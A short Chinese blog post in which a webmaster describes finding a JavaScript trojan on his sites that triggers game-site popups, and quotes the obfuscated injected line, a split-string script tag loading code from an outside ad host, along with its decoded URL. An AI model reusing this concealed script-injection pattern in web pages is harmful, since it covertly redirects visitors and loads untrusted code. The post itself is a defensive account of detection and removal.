最新消息:商业不相信道德判断,只相信事实与实力!

木马的伪装与甄别

SEO/M天地 admin 1425浏览 0评论

近期网站木马猖獗,朋友的好几个网站屡屡中招,让我也是擦亮双眼,直逼木马巢穴,眼疼啊。

一般木马JS伪装的较多,之前的90kan.com,每日PV上万的时候,屡屡中招,有一dt做的B2B平台,也是惨遭JS的渗入,进而跳转。

木马中毒十分蹊跷, 第一打开有弹窗,之后无论怎么涮新都不出现,但是当你把cookie清理完毕的时候,第二次又将显身了,清理cookie时候,你将发现这个操蛋的东东。

特征是打开首页出现
http://ww w.qq937.com/mhxx/tz/3370.html?cid=3370 的游戏弹窗.

技术排查出木马,文盲站长没让技术删除..决定继续发扬我文盲站长不信邪的精神..百度+google.终于在今天傍晚找到代码挂在 js文件中 这段代码 是
(“<sc”+”ript src=’http://ad”+”.nu”+”99″+”.co”+”m/ip”+”.asp?lo”+”c=hefei’></sc”+”ript>”);

翻译过来就是 http:// ad.nu99.com/ip.asp?loc=hefei 屏蔽我所在地区了

找到这段代码,删除掉了. 我会继续观察,看有没有删除干净.如果没有,继续再找.

转载请注明:李坤锋 » 木马的伪装与甄别

您必须 登录 才能发表评论!